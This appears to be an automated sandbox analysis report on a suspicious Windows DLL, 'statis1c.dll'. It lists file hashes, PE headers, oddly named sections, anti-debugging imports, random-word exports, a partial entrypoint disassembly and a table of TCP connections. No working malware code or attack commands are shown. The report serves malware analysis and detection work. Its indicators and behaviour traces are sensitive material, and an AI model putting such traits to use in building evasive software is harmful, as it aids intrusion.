                                                                                                                                                                                                                                        Size (bytes):13557
                                                                                                                                                                                                                                        Entropy (8bit):0.7767725702962421
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lobj9lobj9lWb3j/B4Oyg:kBqoIQuzj/B4k
                                                                                                                                                                                                                                        MD5:A474AEB8AFA98B1AC7AAA4287909D5D6
                                                                                                                                                                                                                                        SHA1:261C34B0D3600A5F4D2DD8CCDBE22180D31DBB71
                                                                                                                                                                                                                                        SHA-256:3205C568F8502CFA3AB9AC15B58273CCA966956B4DFFFA9701041E39FA86CB08
                                                                                                                                                                                                                                        SHA-512:11DE2E3616B9F23A255E532824E250FAF9EC3800E29CAFB22E1D9D471EDA5155E86670284B934FD02E75F6D391BF51B5EC59BDD470630F543A9EA58373B7E24C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CWQQ0ALDWD4ZPCNF2J34.temp
                                                                                                                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):5149
                                                                                                                                                                                                                                        Entropy (8bit):3.197700906094055
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:WdiAPMXIAC9GrIoRAsASFXqdiAPMXIAh683GrIoRAczkqdiAPMXIAx9GrIoRAV1H:qPgi9SxAJxPgv3SxAsPgR9SxAf
                                                                                                                                                                                                                                        MD5:5165E20D2BF8F629A0E35997D5BCA563
                                                                                                                                                                                                                                        SHA1:BF875FA953C780137C202BFA11420733ACAC66F2
                                                                                                                                                                                                                                        SHA-256:576B07BEAA89093228642BDAD36121B5BD4204ACA6DBEA688E06043B7C133531
                                                                                                                                                                                                                                        SHA-512:E9F91A08AB5024B5BE1AEAD027F2D411CC5401C9585CB5757A295ABD970517D2F89E4A31781F7CD21C2230F83408ED575BDA0E3F94D8AA3345481BEF770C578B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview: ...................................FL..................F.@.. .....@.>...7.[.......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.u..PROGRA~1..t......L.>Q.u....E...............J......Q_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..Q................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.Q.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........g.!^.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                                                                        Entropy (8bit):6.230924540321413
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                                        • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:statis1c.dll
                                                                                                                                                                                                                                        File size:168448
                                                                                                                                                                                                                                        MD5:ea2e244513c36f594c69f7e1d5c17317
                                                                                                                                                                                                                                        SHA1:ebac5d8a67a2be742c2139f3cdb25316ff4391e0
                                                                                                                                                                                                                                        SHA256:9cabfa3e674b0274b3b802695b49d9634e027fb15aa827afaf793104f7317690
                                                                                                                                                                                                                                        SHA512:47657f205df9958f216dcd4a474488dfc888d157d10cd415b21576a697de23c4ddc754b184dde9bb99fa05e24a4d87be59a46cc8f18db0b0b4c92f030b830632
                                                                                                                                                                                                                                        SSDEEP:3072:YIEoIehmDRJbzgGlc8zmo6g7L0sqGR+N4kFjUI1Cpfmrepwnwb8:9snbzgGMgPlRmhjUpOJ
                                                                                                                                                                                                                                        File Content Preview:MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L..................!.........x....................@.................................................................I...Y..

                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                        Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Entrypoint:0x402e01
                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                                                        DLL Characteristics:
                                                                                                                                                                                                                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:04e5f4eab2a79a5bd0f00ebe50d7ab1a

                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                        push 0000000Fh
                                                                                                                                                                                                                                        jmp 00007FF6B8788C7Bh
                                                                                                                                                                                                                                        add ecx, dword ptr [esp+2Ch]
                                                                                                                                                                                                                                        mov dword ptr [ebp-28h], eax
                                                                                                                                                                                                                                        push dword ptr [00427964h]
                                                                                                                                                                                                                                        push dword ptr [00427968h]
                                                                                                                                                                                                                                        push dword ptr [00427948h]
                                                                                                                                                                                                                                        jmp 00007FF6B87870B4h
                                                                                                                                                                                                                                        add edi, dword ptr [eax+04h]
                                                                                                                                                                                                                                        sub esp, 0000012Ch
                                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                                        lea ebp, dword ptr [edx+4E0811A1h]
                                                                                                                                                                                                                                        sub al, 36h
                                                                                                                                                                                                                                        jmp 00007FF6B8782579h
                                                                                                                                                                                                                                        or ecx, eax
                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                        sub esp, 18h
                                                                                                                                                                                                                                        push 00426C04h
                                                                                                                                                                                                                                        jmp 00007FF6B87855B1h
                                                                                                                                                                                                                                        sub edi, edx
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        push 00000036h
                                                                                                                                                                                                                                        push 00000035h
                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                        jmp 00007FF6B8783910h
                                                                                                                                                                                                                                        add edi, dword ptr [ebx-3Ch]
                                                                                                                                                                                                                                        jne 00007FF6B878364Eh
                                                                                                                                                                                                                                        mov dword ptr [00427948h], eax
                                                                                                                                                                                                                                        push 00426C04h
                                                                                                                                                                                                                                        jmp 00007FF6B8782517h
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        push 004247FCh
                                                                                                                                                                                                                                        call dword ptr [0040C7E0h]
                                                                                                                                                                                                                                        mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                                                        mov dword ptr [00427968h], eax
                                                                                                                                                                                                                                        jmp 00007FF6B8787D82h
                                                                                                                                                                                                                                        shl edx, 08h
                                                                                                                                                                                                                                        sub al, cl
                                                                                                                                                                                                                                        jmp 00007FF6B878ABBEh
                                                                                                                                                                                                                                        add esp, 0Ch
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        push 00000026h
                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                        jmp 00007FF6B8789924h
                                                                                                                                                                                                                                        add ecx, 895CD7BEh
                                                                                                                                                                                                                                        shr eax, 08h
                                                                                                                                                                                                                                        mov dword ptr [00427968h], eax
                                                                                                                                                                                                                                        push dword ptr [00427948h]
                                                                                                                                                                                                                                        jmp 00007FF6B87887C2h
                                                                                                                                                                                                                                        int3

                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xac490x559.text
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x26d640xc8
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x590000xb54.reloc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xc7b80x80
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        .text0x10000xa1ca0xa200False0.608748070988data6.41153263646IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        0xc0000x1fdd40x1ba00False0.568969174208data5.89718563133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .electro0x2c0000x44c90x200False0.2421875data1.87477506452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .socker0x310000x7f0x200False0.271484375data1.9574067296IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .deceivi0x320000x6a0x200False0.232421875data1.76926085518IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .vedro0x330000x44d10x200False0.248046875data1.83333543287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .obstrep0x380000x44c80x200False0.23828125data1.77241067207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .br0x3d0000x44e90x200False0.296875data2.17838811575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .es0x420000x680x200False0.23046875data1.7010985056IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .lunaria0x430000x44e50x200False0.296875data2.22690778166IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .droopin0x480000x8d0x200False0.287109375data2.19149920646IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .cal0x490000x44de0x200False0.26953125data1.9352331921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .fingers0x4e0000x670x200False0.220703125data1.56371286481IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .scotomy0x4f0000x44e00x200False0.283203125data2.00296171383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .lienter0x540000x44cb0x200False0.236328125data1.65255785142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .reloc0x590000xb540xc00False0.812174479167data6.66541317296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        advapi32.dllRegOpenKeyExW
                                                                                                                                                                                                                                        kernel32.dllCloseHandle, VirtualProtect, ReleaseMutex, GetProcAddress, IsDebuggerPresent, MultiByteToWideChar, GetCurrentProcessId, WaitForSingleObject, GetModuleHandleW, QueryPerformanceCounter, GetCurrentThreadId, CreateMutexW, GetModuleFileNameA, IsProcessorFeaturePresent, WideCharToMultiByte
                                                                                                                                                                                                                                        loadperf.dllLoadPerfCounterTextStringsW
                                                                                                                                                                                                                                        ntlanman.dllNPGetReconnectFlags
                                                                                                                                                                                                                                        rasdlg.dllRasSrvEnumConnections
                                                                                                                                                                                                                                        rsaenh.dllCPHashData
                                                                                                                                                                                                                                        upnp.dllDllCanUnloadNow
                                                                                                                                                                                                                                        user32.dllPostMessageW
                                                                                                                                                                                                                                        vbscript.dllDllGetClassObject

                                                                                                                                                                                                                                        Exports

                                                                                                                                                                                                                                        NameOrdinalAddress
                                                                                                                                                                                                                                        Halitheriidae10x4012cc
                                                                                                                                                                                                                                        Ablach20x4013d7
                                                                                                                                                                                                                                        DllRegisterServer30x40147a
                                                                                                                                                                                                                                        Peridesmium40x401a6f
                                                                                                                                                                                                                                        Ammelide50x401c6e
                                                                                                                                                                                                                                        Arteriography60x401cd6
                                                                                                                                                                                                                                        Conidiophorous70x401d1d
                                                                                                                                                                                                                                        Lanuginousness80x401db2
                                                                                                                                                                                                                                        Seamrend90x401e4a
                                                                                                                                                                                                                                        Recriminative100x401f4d
                                                                                                                                                                                                                                        Killing110x402303
                                                                                                                                                                                                                                        Zamang120x402a96
                                                                                                                                                                                                                                        Mesometrium130x402b8c
                                                                                                                                                                                                                                        Preimportance140x402e01
                                                                                                                                                                                                                                        Outweigh150x402e46
                                                                                                                                                                                                                                        Crystallitic160x4033a8
                                                                                                                                                                                                                                        Firnismalerei170x4035bc
                                                                                                                                                                                                                                        Cacatuinae180x40380a
                                                                                                                                                                                                                                        DllUnregisterServer190x403b4e
                                                                                                                                                                                                                                        Dissimile200x403ddc
                                                                                                                                                                                                                                        Bothlike210x403f87
                                                                                                                                                                                                                                        Actiniform220x404322
                                                                                                                                                                                                                                        Pneumomalacia230x404546
                                                                                                                                                                                                                                        Theralite240x404656
                                                                                                                                                                                                                                        Horsehood250x404685
                                                                                                                                                                                                                                        Teedle260x404d55
                                                                                                                                                                                                                                        Highbinder270x404ff8
                                                                                                                                                                                                                                        Amelus280x405301
                                                                                                                                                                                                                                        Overbashfulness290x4058cc
                                                                                                                                                                                                                                        Showboard300x405906
                                                                                                                                                                                                                                        Subpatron310x405af0
                                                                                                                                                                                                                                        Boleite320x405bf6
                                                                                                                                                                                                                                        Dronishly330x40611f
                                                                                                                                                                                                                                        Clavellated340x4061c4
                                                                                                                                                                                                                                        Slinkily350x406447
                                                                                                                                                                                                                                        Hellhole360x406694
                                                                                                                                                                                                                                        Cutwork370x406763
                                                                                                                                                                                                                                        Afterhend380x4067c1
                                                                                                                                                                                                                                        Succursal390x406ad4
                                                                                                                                                                                                                                        Iridodiagnosis400x407046
                                                                                                                                                                                                                                        Somnambulator410x4070b5
                                                                                                                                                                                                                                        Forlet420x4072ed
                                                                                                                                                                                                                                        Eupepsia430x407337
                                                                                                                                                                                                                                        Micrurus440x407583
                                                                                                                                                                                                                                        Unmounting450x4077f8
                                                                                                                                                                                                                                        Municipalizer460x407814
                                                                                                                                                                                                                                        Phengitical470x408200
                                                                                                                                                                                                                                        Pyroterebic480x4083e5
                                                                                                                                                                                                                                        Oscillometer490x408677
                                                                                                                                                                                                                                        Overglorious500x4088ff
                                                                                                                                                                                                                                        Stabilize510x408bcd
                                                                                                                                                                                                                                        Pandoridae520x408e8b
                                                                                                                                                                                                                                        Myriarchy530x409147
                                                                                                                                                                                                                                        Entrain540x409308
                                                                                                                                                                                                                                        Sorceress550x40944d
                                                                                                                                                                                                                                        DllCanUnloadNow560x40c820
                                                                                                                                                                                                                                        Amphisbaenidae570x4095eb
                                                                                                                                                                                                                                        Tizzy580x409672
                                                                                                                                                                                                                                        Gradualistic590x409704
                                                                                                                                                                                                                                        Studwork600x40975f
                                                                                                                                                                                                                                        Batino610x409b86
                                                                                                                                                                                                                                        Woodworker620x409d0b
                                                                                                                                                                                                                                        Preoccur630x409e63
                                                                                                                                                                                                                                        DllGetClassObject640x40c830

                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.139945030 CET49742443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.142003059 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.142075062 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.142108917 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.142165899 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.142210960 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.159244061 CET44349742151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.159395933 CET49742443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.161252975 CET44349743151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.161284924 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.161309004 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.161335945 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.161362886 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.161418915 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.161449909 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.161489010 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.161494970 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.161731005 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.174519062 CET49742443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.177025080 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.177571058 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.177752972 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.177963018 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.178885937 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.193764925 CET44349742151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.194737911 CET44349742151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.194782972 CET44349742151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.194814920 CET44349742151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.194880962 CET49742443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.194926977 CET49742443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.196157932 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.196777105 CET44349743151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.196808100 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197117090 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197551012 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197592020 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197638035 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197638988 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197670937 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197684050 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197782993 CET44349743151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197839975 CET44349743151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197876930 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197922945 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197936058 CET44349743151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197978020 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198015928 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198019028 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198050976 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198054075 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198067904 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198076963 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198103905 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198390007 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198446035 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198477983 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198479891 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198517084 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.198523998 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.199029922 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.199073076 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.199105024 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.199131966 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.199145079 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.199150085 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.222639084 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.229216099 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.242024899 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.242106915 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.248631954 CET44349743151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.248722076 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.257539988 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.261801958 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.261925936 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.262032032 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.262135029 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.262234926 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.262335062 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.262491941 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.262540102 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.262641907 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.262859106 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.269421101 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.270134926 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.270483971 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.273422956 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.275629044 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.275784969 CET49742443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.276206970 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.276287079 CET49742443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.276777029 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.276875019 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.277785063 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.281071901 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.281461954 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.281507015 CET44349745151.101.1.44192.168.2.5
